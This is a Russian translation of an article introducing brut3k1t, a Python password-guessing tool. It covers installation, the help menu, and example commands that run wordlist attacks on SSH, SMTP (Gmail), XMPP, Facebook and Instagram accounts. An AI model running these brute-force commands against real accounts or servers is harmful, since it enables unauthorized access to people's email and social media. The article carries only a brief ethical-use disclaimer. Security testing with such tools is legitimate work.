brut3k1t — серверный модуль Bruteforce

Серверный модуль Bruteforce: brut3k1t

Скачать brut3k1t

brut3k1t является серверным модулем bruteforce, который поддерживает атаки «Перебор по словарю» для нескольких протоколов. Текущие и завершенные протоколы, которые уже поддерживаются:

• ssh
• ftp
• smtp
• XMPP
• instagram
• facebook

В будущем планируется реализация различных протоколов и служб (включая Twitter, Facebook, Instagram).

Установка brut3k1t

Установка очень проста. Для brut3k1t требуется несколько зависимостей, хотя они будут установлены программой, если у вас ее нет.

• argparse – Используется для анализа аргументов командной строки
• paramiko – Используется для работы с SSH-соединениями и аутентификацией
• ftplib – Используется для работы с FTP-соединениями и аутентификацией
• smtplib – Используется для работы с соединениями SMTP (электронная почта) и аутентификацией
• fbchat – Используется для подключения к Facebook
• selenium – Используется для веб-скрепления, который используется с Instagram (и позже с Twitter)
• xmppy – используется для XMPP соединений …а также многое другое в будущем!

Процесс скачивания очень прост. Достаточно выполнить git clone:

git clone https://github.com/ex0dus-0x/brut3k1t

Сменить директорию:

cd /path/to/brut3k1t

Использование brut3k1t

Использование brut3k1t является более сложным, чем обычный запуск Python файла.

Введите python brut3k1t -h и это вызовет меню помощи:

usage: brut3k1t.py [-h] [-s SERVICE] [-u USERNAME] [-w PASSWORD] [-a ADDRESS]
[-p PORT] [-d DELAY]
Server-side bruteforce module written in Python
optional arguments:
-h, --help show this help message and exit
-a ADDRESS, --address ADDRESS
Provide host address for specified service. Required
for certain protocols
-p PORT, --port PORT Provide port for host address for specified service.
If not specified, will be automatically set
-d DELAY, --delay DELAY
Provide the number of seconds the program delays as
each password is tried
required arguments:
-s SERVICE, --service SERVICE
Provide a service being attacked. Several protocols
and services are supported
-u USERNAME, --username USERNAME
Provide a valid username for service/protocol being
executed
-w PASSWORD, --wordlist PASSWORD
Provide a wordlist or directory to a wordlist

Примеры использования:

Взлом SSH сервера работающего на 192.168.1.3 используя root и wordlist.txt в качестве wordlist.

python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt

Программа автоматически установит порт на 22, но если он отличается, укажите -p пометку.

Взлом электронной почты test@gmail.com с wordlist.txt на порту 25 с задержкой в 3 секунды. Для электронной почты необходимо использовать адрес сервера SMTP. Например, для Gmail = smtp.gmail.com. Вы можете исследовать этот вопрос с помощью Google.

python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w wordlist.txt -p 25 -d 3

Взлом XMPP test@creep.im с wordlist.txt на порту по умолчанию 5222. XMPP является схожим с SMTP, не смотря на то, что вам придется указать адрес XMPP сервера, в данном случае creep.im.

python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt

Взлом Facebook является настоящим вызовом, поскольку вам понадобится целевой ID пользователя, а не имя пользователя.

python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt

Взлом Instagram с именем пользователя test с wordlist wordlist.txt, а также с 5 секундной задержкой

python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5

## Ключевые замечания, которые необходимо помнить

• Если вы не указали -p пометку порту, будет использован порт по умолчанию. Вам не нужно предоставлять пометку для Facebook и Instagram, т.к. они базируются на интернет технологиях;
• Если вы не указали пометку задержки -d, задержка по умолчанию составит 1 секунду;
• Помните, используйте адрес SMTP-сервера и адрес сервера XMPP для пометки адреса -a при взломе SMTP и XMPP, соответственно;
• Facebook требует ID имени пользователя. Это довольно неудобно, поскольку некоторые люди не отображают свой идентификатор публично в своем профиле.
• Убедитесь, что указаны wordlist и директория, где он находится. Если это /usr/local/wordlists/wordlist.txt укажите пометку-w для wordlist.
• Помните, что некоторые протоколы не основываются на их порту по умолчанию. FTP-сервер не обязательно будет всегда находиться на порту 21. Пожалуйста, имейте это в виду;
• Используйте это для образовательных и этических хакерских целей, а также для обучения коду и деятельности, направленной на обеспечение безопасности. Никаких скриптов, парни!

Перевод: Анна Давыдова
Источник: n0where.net

Это интересно:

• [Web Application Pentesting] Аутентификация HTTP, Атаки на HTTP Basic Auth
• Crunch — генератор паролей: основы использования и практические примеры
• XSStrike-Fuzz and Bruteforce Parameters for XSS